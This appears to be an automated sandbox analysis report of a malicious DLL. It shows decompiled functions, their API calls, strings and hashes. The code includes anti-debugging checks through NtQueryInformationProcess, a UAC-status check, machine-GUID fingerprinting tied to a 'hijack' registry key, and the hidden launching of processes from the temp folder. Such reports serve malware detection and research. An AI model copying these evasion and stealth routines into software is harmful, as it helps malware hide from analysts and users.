Opcode ID: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
Instruction ID: 1ac3354d9508f96bf62ada26ae39cff1003ebfb3b345a0bbc8a583754ab99eb2
Opcode Fuzzy Hash: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
Instruction Fuzzy Hash: 794142F5D0021967DB14F7A0AD86FEA7378EB14744F4405A9EA0899042FA70FBC8CA92

Uniqueness

Uniqueness Score: -1.00%

Function 1001FF30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1001FF30(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E100231AF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A230(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}

APIs

_memset.LIBCMT ref: 1001FF6A
_memset.LIBCMT ref: 1001FF87

Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705

GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FFA7
_sprintf.LIBCMT ref: 1001FFD7

Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
Part of subcall function 1001A230: CreateProcessA.KERNEL32(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

0011, xrefs: 1001FFB6
%s%s %s %s, xrefs: 1001FFCB

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
String ID: %s%s %s %s$0011
API String ID: 3552933064-2132516514
Opcode ID: e032b5f0e706b41ccc8eebc233dcfcdad72b1f83bb562cf4899ba28d6070bd7a
Instruction ID: 62c6fe1a66a65cb1ec0840fa29cfc7a83406d050d9b9e0d4994b5c30bbe0bab3
Opcode Fuzzy Hash: e032b5f0e706b41ccc8eebc233dcfcdad72b1f83bb562cf4899ba28d6070bd7a
Instruction Fuzzy Hash: C411C8B6C00208ABEB14EBA0DC46FDD7778EB04750F4441A4F619661C1EB787749CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A230, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A230(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				void* _t27;

				_v24 = 0;
				E1000CF80(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF80(_t27,  &_v20, 0, 0x10);
				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}

0x1001a236
0x1001a245
0x1001a24d
0x1001a254
0x1001a25b
0x1001a269
0x1001a293
0x1001a299
0x1001a2a3
0x1001a2a9
0x1001a2a9
0x1001a2b6

APIs

_memset.LIBCMT ref: 1001A245
_memset.LIBCMT ref: 1001A269
CreateProcessA.KERNEL32(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
CloseHandle.KERNEL32(?), ref: 1001A299
CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

D, xrefs: 1001A24D

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle_memset$CreateProcess
String ID: D
API String ID: 1151464618-2746444292
Opcode ID: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
Instruction ID: 109a0bc55e8301458d6397c35f4bc98ddca4d2c3873fb5e4ea0d57c84511a1e7
Opcode Fuzzy Hash: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
Instruction Fuzzy Hash: 1601E1B590431DABEB00DBD0DC89FEE7779FB44704F140518FA04AB281DBB5A958CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001AF10, Relevance: 8.9, APIs: 7, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AF10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DFB8(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AAC0);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CEAF(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000DA30( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AAF0);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

APIs

SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF42
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF6E

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
Instruction ID: 27e70c85a8907a9ba83dd9d1e295feb5005e929d9b7098f35adbadc5d796aaa6
Opcode Fuzzy Hash: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
Instruction Fuzzy Hash: 3371C374A00109EFDB08CF98C995AAEB7F1FF49304F618599E915AB345D734EA81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1001FE50(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E1002319D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A230(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}

APIs

_memset.LIBCMT ref: 1001FE8A
_memset.LIBCMT ref: 1001FEA7

Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705

GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FEC7
_sprintf.LIBCMT ref: 1001FEF2

Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
Part of subcall function 1001A230: CreateProcessA.KERNEL32(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

%s%s 200 %s, xrefs: 1001FEE6

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
String ID: %s%s 200 %s
API String ID: 3552933064-2772210913
Opcode ID: ce90ed0a13cde6149e5664a0142d3e14730c90d1d17c5f30a3d17ad9f80fcc3e
Instruction ID: 328eacdc9b4bdea93596339cccc9e681f099fe81ec3ee43fd56346c21baab8d1
Opcode Fuzzy Hash: ce90ed0a13cde6149e5664a0142d3e14730c90d1d17c5f30a3d17ad9f80fcc3e
Instruction Fuzzy Hash: 5711B6B6C00208ABEB14EBA0DC56FDD7778EB04750F4441A4F619A61C1EB787788CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F9F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001F9F0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF80(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A350( &_v276,  &_v12);
				E1000CDB3( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A4E0(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CCA3(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA40(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}

0x1001f9f0
0x1001f9f0
0x1001f9f9
0x1001fa0e
0x1001fa16
0x1001fa28
0x1001fa41
0x1001fa58
0x1001fa68
0x1001fa70
0x1001fa74
0x1001fa79
0x00000000
0x1001fa7f
0x1001fa85

APIs

_memset.LIBCMT ref: 1001FA0E

Part of subcall function 1001A350: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379

_strcat_s.LIBCMT ref: 1001FA41

Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616

_sprintf.LIBCMT ref: 1001FA68

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Strings

hijack, xrefs: 1001FA30
SOFTWARE\Microsoft\%s, xrefs: 1001FA5F

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
String ID: SOFTWARE\Microsoft\%s$hijack
API String ID: 3138967372-3622423033
Opcode ID: ab9e3645ffe6a09c5898803410f9ba2ac02775f5c504d206e634dc87c7f5ca2e
Instruction ID: 9d0dca558a4647b1c94e9ab51dbd61ee89e2acb8972101442078f4140e755168
Opcode Fuzzy Hash: ab9e3645ffe6a09c5898803410f9ba2ac02775f5c504d206e634dc87c7f5ca2e
Instruction Fuzzy Hash: 8F0152F9C0020CA7DB15D7A0EC46FE97778AB54304F0404A9A61856141E7B5AB88C792

Uniqueness

Uniqueness Score: -1.00%

Function 1001D2A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001D2A0() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x1001d2a6
0x1001d2ad
0x1001d2b4
0x1001d2bb
0x1001d2c2
0x1001d2e6
0x1001d307
0x1001d312
0x1001d312
0x1001d319
0x1001d319
0x1001d325

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
RegCloseKey.ADVAPI32(00000000), ref: 1001D319

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D2D4
EnableLUA, xrefs: 1001D2F6

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
API String ID: 3677997916-2194944742
Opcode ID: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
Instruction ID: 8e6b4177a17e8aca07570e164a523334bb235141b85f1ba5573b08480178a58a
Opcode Fuzzy Hash: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
Instruction Fuzzy Hash: 9D01FFB6D00219FBEB04DFD1CD88BEEB7B8EB44305F104059E611B6180D7759B44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001A350, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A350(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;

				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					return _v12;
				}
				return 0;
			}

0x1001a356
0x1001a35d
0x1001a381
0x1001a3a4
0x1001a3aa
0x1001a3aa
0x1001a3b5
0x00000000
0x1001a3bb
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A39C
RegCloseKey.ADVAPI32(00000000), ref: 1001A3B5

Strings

MachineGuid, xrefs: 1001A393
Software\Microsoft\Cryptography, xrefs: 1001A36F

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: MachineGuid$Software\Microsoft\Cryptography
API String ID: 3677997916-880526231
Opcode ID: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
Instruction ID: 036869a64e7b96092babc19efb2470d9694155ef05369fbbd3590e376cbd9c8c
Opcode Fuzzy Hash: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
Instruction Fuzzy Hash: 99F01275600208FBEB10DFA0DC85F9D77B9EB08700F604148FA14AB280DB75DB81DB65

Uniqueness

Uniqueness Score: -1.00%

Function 100118DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E100118DF(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10334594);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10334590);
					_t11 =  *(TlsGetValue( *0x10334594))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10334590);
				 *((intOrPtr*)(E1001158A( *0x10335480)))();
				_push(_t11);
				L100117AC(_t9, _t11, _t15, _t16);
				_t5 =  *0x10334594; // 0x1d
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}

0x100118df
0x100118ec
0x100118ee
0x100118f0
0x100118f2
0x10011902
0x10011902
0x10011904
0x10011905
0x10011907
0x10011919
0x1001191b
0x1001191c
0x10011922
0x1001192a
0x00000000
0x1001192f
0x10011935

APIs

TlsGetValue.KERNEL32 ref: 100118EC
TlsGetValue.KERNEL32 ref: 100118FE
__decode_pointer.LIBCMT ref: 10011913
TlsSetValue.KERNEL32(0000001D,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331640,0000000C,1000EC47), ref: 1001192F

Strings

tj, xrefs: 1001192A

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$__decode_pointer
String ID: tj
API String ID: 3389472636-3491506833
Opcode ID: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
Instruction ID: 5ea32f06f5c113a557663da0afc6a555ab05ec8127c22f0ad06d45371975ea5c
Opcode Fuzzy Hash: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
Instruction Fuzzy Hash: 25E06D3A800120AFFA059B759CC4B693F6AFBCA661F110111F12CDE0B2DE31ECA29A00

Uniqueness

Uniqueness Score: -1.00%

Function 1001A000, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1001A000() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}

0x1001a006
0x1001a018
0x1001a02a
0x1001a03e
0x1001a04d

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 1001A012
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 1001A024
GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 1001A037

Strings

Ntdll.dll, xrefs: 1001A00D
NtQueryInformationProcess, xrefs: 1001A01B

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 353374858-801751246
Opcode ID: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
Instruction ID: 71e2acb23208394f78a226fd07bfd7a9a839184327190de95aec6d8225f51f41
Opcode Fuzzy Hash: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
Instruction Fuzzy Hash: 4DF0A575D44208FFEB10EBE0DD8DB9DBBB8EB04201F614494EA15A6180EA746A49CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10019F60, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019F60() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}

0x10019f66
0x10019f78
0x10019f8a
0x10019f9e
0x10019fad

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F72
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F84
GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F97

Strings

NtQueryInformationProcess, xrefs: 10019F7B
Ntdll.dll, xrefs: 10019F6D

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 353374858-801751246
Opcode ID: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
Instruction ID: d88cad77f1889e8aed178f934c13fc5a1fcc4ce016c014487da4b3248a857db2
Opcode Fuzzy Hash: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
Instruction Fuzzy Hash: 1FF01C75900208FBEB00DBE08D8DA9CBB78EB04301F514094FB11A6140DA751A48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10019FB0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019FB0() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}

0x10019fb6
0x10019fc8
0x10019fda
0x10019fee
0x10019ffd

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FC2
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FD4
GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019FE7

Strings

Ntdll.dll, xrefs: 10019FBD
NtQueryInformationProcess, xrefs: 10019FCB

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
